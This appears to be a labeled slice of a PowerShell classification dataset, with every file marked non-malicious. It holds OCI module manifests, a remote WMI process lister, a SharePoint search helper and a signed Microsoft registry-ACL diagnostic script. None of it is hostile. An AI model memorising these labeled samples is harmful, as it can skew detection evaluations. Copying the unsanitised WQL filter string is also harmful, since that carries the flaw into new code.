'New-OCIDevopsTrigger', 'Remove-OCIDevopsBuildPipeline', 'Remove-OCIDevopsBuildPipelineStage', 'Remove-OCIDevopsConnection', 'Remove-OCIDevopsDeployArtifact', 'Remove-OCIDevopsDeployEnvironment', 'Remove-OCIDevopsDeployPipeline', 'Remove-OCIDevopsDeployStage', 'Remove-OCIDevopsProject', 'Remove-OCIDevopsRef', 'Remove-OCIDevopsRepository', 'Remove-OCIDevopsTrigger', 'Stop-OCIDevopsBuildRun', 'Stop-OCIDevopsDeployment', 'Stop-OCIDevopsScheduledCascadingProjectDeletion', 'Update-OCIDevopsBuildPipeline', 'Update-OCIDevopsBuildPipelineStage', 'Update-OCIDevopsBuildRun', 'Update-OCIDevopsConnection', 'Update-OCIDevopsDeployArtifact', 'Update-OCIDevopsDeployEnvironment', 'Update-OCIDevopsDeployment', 'Update-OCIDevopsDeployPipeline', 'Update-OCIDevopsDeployStage', 'Update-OCIDevopsProject', 'Update-OCIDevopsRepository', 'Update-OCIDevopsTrigger', 'Write-OCIDevopsRepositoryRef' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Devops' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_60_56.ps1
sample_60_56.ps1
# # Module manifest for module 'OCI.PSModules.Dns' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Dns.dll' # Version number of this module. ModuleVersion = '86.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'd69f0172-1c3b-4e1b-97f5-d455d0244e12' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Dns Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dns.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIDnsDomainRecords', 'Get-OCIDnsResolver', 'Get-OCIDnsResolverEndpoint', 'Get-OCIDnsResolverEndpointsList', 'Get-OCIDnsResolversList', 'Get-OCIDnsRRSet', 'Get-OCIDnsSteeringPoliciesList', 'Get-OCIDnsSteeringPolicy', 'Get-OCIDnsSteeringPolicyAttachment', 'Get-OCIDnsSteeringPolicyAttachmentsList', 'Get-OCIDnsTsigKey', 'Get-OCIDnsTsigKeysList', 'Get-OCIDnsView', 'Get-OCIDnsViewsList', 'Get-OCIDnsZone', 'Get-OCIDnsZoneContent', 'Get-OCIDnsZoneRecords', 'Get-OCIDnsZonesList', 'Get-OCIDnsZoneTransferServersList', 'Invoke-OCIDnsPatchDomainRecords', 'Invoke-OCIDnsPatchRRSet', 'Invoke-OCIDnsPatchZoneRecords', 'Move-OCIDnsResolverCompartment', 'Move-OCIDnsSteeringPolicyCompartment', 'Move-OCIDnsTsigKeyCompartment', 'Move-OCIDnsViewCompartment', 'Move-OCIDnsZoneCompartment', 'New-OCIDnsResolverEndpoint', 'New-OCIDnsSteeringPolicy', 'New-OCIDnsSteeringPolicyAttachment', 'New-OCIDnsTsigKey', 'New-OCIDnsView', 'New-OCIDnsZone', 'New-OCIDnsZoneFromZoneFile', 'Remove-OCIDnsDomainRecords', 'Remove-OCIDnsResolverEndpoint', 'Remove-OCIDnsRRSet', 'Remove-OCIDnsSteeringPolicy', 'Remove-OCIDnsSteeringPolicyAttachment', 'Remove-OCIDnsTsigKey', 'Remove-OCIDnsView', 'Remove-OCIDnsZone', 'Update-OCIDnsDomainRecords', 'Update-OCIDnsResolver', 'Update-OCIDnsResolverEndpoint', 'Update-OCIDnsRRSet', 'Update-OCIDnsSteeringPolicy', 'Update-OCIDnsSteeringPolicyAttachment', 'Update-OCIDnsTsigKey', 'Update-OCIDnsView', 'Update-OCIDnsZone', 'Update-OCIDnsZoneRecords' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dns' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/View-Process_v2.ps1
View-Process_v2.ps1
function View-Process(){ param( [string[]]$ComputerNames, [string[]]$ProcessNames, $User ) if ($User -is [String]){ $Connection = Get-Credential -Credential $User } if ($ProcessNames -eq $null){ if ($Connection -eq $null){ foreach ($int1 in $ComputerNames){ $View_Process = gwmi "win32_process" -ComputerName $int1 | select __SERVER,Name,Handle $View_Process } } else { foreach ($int1 in $ComputerNames){ $View_Process = gwmi "win32_process" -ComputerName $int1 -Credential $Connection | select __SERVER,Name,Handle $View_Process } } } else { if ($Connection -eq $null){ foreach ($int1 in $ComputerNames){ foreach ($int2 in $ProcessNames){ if ($int2 -notlike "*.exe") {$int2 = $int2 + '.exe'} $View_Process = gwmi "win32_process" -ComputerName $int1 -filter "name='$int2'" | select __SERVER,Name,Handle $View_Process } } } else { foreach ($int1 in $ComputerNames){ foreach ($int2 in $ProcessNames){ $View_Process = gwmi "win32_process" -ComputerName $int1 -filter "name='$int2'" -Credential $Connection | select __SERVER,Name,Handle $View_Process } } } } }
combined_dataset/train/non-malicious/Run-Query (SharePoint)_1.ps1
Run-Query (SharePoint)_1.ps1
function Run-Query($siteUrl, $queryText) { [reflection.assembly]::loadwithpartialname("microsoft.sharePOint") | out-null [reflection.assembly]::loadwithpartialname("microsoft.office.server") | out-null [reflection.assembly]::loadwithpartialname("microsoft.office.server.search") | out-null $s = [microsoft.sharepoint.spsite]$siteUrl $q = new-object microsoft.office.server.search.query.fulltextsqlquery -arg $s $q.querytext = $queryText $q.RowLimit = 100 $q.ResultTypes = "RelevantResults" $dt = $q.Execute() $r = $dt["RelevantResults"] $output = @() while ($r.Read()) { $o = new-object PSObject 0..($r.FieldCount-1) | foreach { add-member -inputObject $o -memberType "NoteProperty" -name $r.GetName($_) -value $r[$_].ToString() } $output += $o } return $output } @@ @@ @@#Sample usage: @@#Run-Query -siteUrl "http://dev/" -queryText "SELECT PreferredName, WorkPhone FROM S" @@ @@
combined_dataset/train/non-malicious/sample_3_69.ps1
sample_3_69.ps1
#************************************************ # TS_2K3CLSIDUserACLCheck.ps1 # Version 1.0.1 # Date: 6/12/2012 # Author: v-kaw # Description: [Idea ID 4368] [Windows] Windows Logon Slow and Explorer Slow # Rule number: 4368 # Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=4368 #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Display-DefaultActivity -Rule -RuleNumber 4368 $RuleApplicable = $false $RootCauseDetected = $false $RootCauseName = "RC_2K3CLSIDUserACLCheck" $PublicContent = "" $InternalContent = "https://vkbexternal.partners.extranet.microsoft.com/VKBWebService/ViewContent.aspx?scid=KB;EN-US;2176002" $Verbosity = "Warning" $Visibility = "3" $SupportTopicsID = "17266" $Title = $ScriptStrings.ID_2K3CLSIDUserACLCheck_ST $InformationCollected = new-object PSObject # *************************** # Data Gathering # *************************** function CheckReg($Key,$Property,$Value) #Check if the registry key property has a specific value. { if(Test-Path -Path $Key) { if(((Get-ItemProperty -Path $Key).$Property) -eq $Value) { return $true } } return $false } function IsDomainController() #Check if the machine is a DC. { return (CheckReg -Key "HKLM:\SYSTEM\CurrentControlSet\Control\ProductOptions" -Property "ProductType" -Value "LanmanNT") #Call the function CheckReg. } Function AppliesToSystem { return ($OSVersion.Major -eq 5) -and (-not (IsDomainController)) #Windows XP, Windows Server 2003 (non - Domain Controller) } # ************** # Detection Logic # ************** Function CLSIDUserACLCheck() #Check if the local Users group (S-1-5-32-545) has read permissions under HKCR\CLSID registry key { $CLSIDPath="Registry::HKEY_CURRENT_USER\CLSID" if(Test-Path -Path $CLSIDPath) { $SpecificUser = ([System.Security.Principal.SecurityIdentifier]"S-1-5-32-545").Translate([System.Security.Principal.NTAccount]).Value foreach($a in (Get-Acl -Path $CLSIDPath ).Access|Where-Object -FilterScript {$_.IdentityReference -eq $SpecificUser}) { if([System.Security.AccessControl.RegistryRights]::QueryValues -band $a.RegistryRights.value__) { return $false } } } return $true } #Check to see if rule is applicable to this computer if (AppliesToSystem) { $RuleApplicable = $true if (CLSIDUserACLCheck -eq $true) { $RootCauseDetected = $true } } # ********************* # Root Cause processing # ********************* if ($RuleApplicable) { if ($RootCauseDetected) { # Red/ Yellow Light Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title } else { # Green Light Update-DiagRootCause -id $RootCauseName -Detected $false } } # SIG # Begin signature block # MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBD8GAVgOE9z6CM # y7kVweFR+tdqE36ayr30T02uBmHiwaCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEINpouFfAhR2q31XekMqcYpht # QdnibihGqWn6C6PjTnRsMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAAlyEdGvEidcFr6/iL4iP2IwxFgGIJ9gDPAMEOtSc3PiZqAlKY4du8Wjb # gyPqxdF2nbCcnlLv1I8PiF7PTRkQazvvrPAsgbm0/Ik/pe6Ol4mwkgiOIyWv/y4p # Jt2/qrpeQBVJ6FJaxt7K6gXt3w9Qa6lwOmKEGelhWr64wBqUIbx1FGvG6KqxKBE/ # Jikhh2eB/a6sLP8wpacJ9+YH5TrVA4SNv656sQ7g1LpTl9XtP/by7zufaDc4Z19g # 6+y1ihuediDuLsWjVNs0Y/EfP8kKupeG/ebUlxmdUCNgfZzMPB2mmv/wQbRvpVKS # tzbxTFu6VT3eUVJf0qPgjl2iudKUiqGCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC # F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCD4XueMOhbq9ABemMJ/kJejx1PSz5+Pk+/S16kPLAcTcwIGZut+oGFg # GBMyMDI0MTAyODExNDA0MC40NTlaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo2RjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB/Bigr8xpWoc6AAEAAAH8MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzExNFoXDTI1MTAyMjE4MzExNFowgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjZGMUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAp1DAKLxpbQcPVYPHlJHy # W7W5lBZjJWWDjMfl5WyhuAylP/LDm2hb4ymUmSymV0EFRQcmM8BypwjhWP8F7x4i # O88d+9GZ9MQmNh3jSDohhXXgf8rONEAyfCPVmJzM7ytsurZ9xocbuEL7+P7EkIwo # OuMFlTF2G/zuqx1E+wANslpPqPpb8PC56BQxgJCI1LOF5lk3AePJ78OL3aw/Ndlk # vdVl3VgBSPX4Nawt3UgUofuPn/cp9vwKKBwuIWQEFZ837GXXITshd2Mfs6oYfxXE # tmj2SBGEhxVs7xERuWGb0cK6afy7naKkbZI2v1UqsxuZt94rn/ey2ynvunlx0R6/ # b6nNkC1rOTAfWlpsAj/QlzyM6uYTSxYZC2YWzLbbRl0lRtSz+4TdpUU/oAZSB+Y+ # s12Rqmgzi7RVxNcI2lm//sCEm6A63nCJCgYtM+LLe9pTshl/Wf8OOuPQRiA+stTs # g89BOG9tblaz2kfeOkYf5hdH8phAbuOuDQfr6s5Ya6W+vZz6E0Zsenzi0OtMf5RC # a2hADYVgUxD+grC8EptfWeVAWgYCaQFheNN/ZGNQMkk78V63yoPBffJEAu+B5xlT # PYoijUdo9NXovJmoGXj6R8Tgso+QPaAGHKxCbHa1QL9ASMF3Os1jrogCHGiykfp1 # dKGnmA5wJT6Nx7BedlSDsAkCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBSY8aUrsUaz # hxByH79dhiQCL/7QdjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAT7ss/ZAZ0bTa # FsrsiJYd//LQ6ImKb9JZSKiRw9xs8hwk5Y/7zign9gGtweRChC2lJ8GVRHgrFkBx # ACjuuPprSz/UYX7n522JKcudnWuIeE1p30BZrqPTOnscD98DZi6WNTAymnaS7it5 # qAgNInreAJbTU2cAosJoeXAHr50YgSGlmJM+cN6mYLAL6TTFMtFYJrpK9TM5Ryh5 # eZmm6UTJnGg0jt1pF/2u8PSdz3dDy7DF7KDJad2qHxZORvM3k9V8Yn3JI5YLPuLs # o2J5s3fpXyCVgR/hq86g5zjd9bRRyyiC8iLIm/N95q6HWVsCeySetrqfsDyYWStw # L96hy7DIyLL5ih8YFMd0AdmvTRoylmADuKwE2TQCTvPnjnLk7ypJW29t17Yya4V+ # Jlz54sBnPU7kIeYZsvUT+YKgykP1QB+p+uUdRH6e79Vaiz+iewWrIJZ4tXkDMmL2 # 1nh0j+58E1ecAYDvT6B4yFIeonxA/6Gl9Xs7JLciPCIC6hGdliiEBpyYeUF0ohZF # n7NKQu80IZ0jd511WA2bq6x9aUq/zFyf8Egw+dunUj1KtNoWpq7VuJqapckYsmvm # mYHZXCjK1Eus7V1I+aXjrBYuqyM9QpeFZU4U01YG15uWwUCaj0uZlah/RGSYMd84 # y9DCqOpfeKE6PLMk7hLnhvcOQrnxP6kwggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # 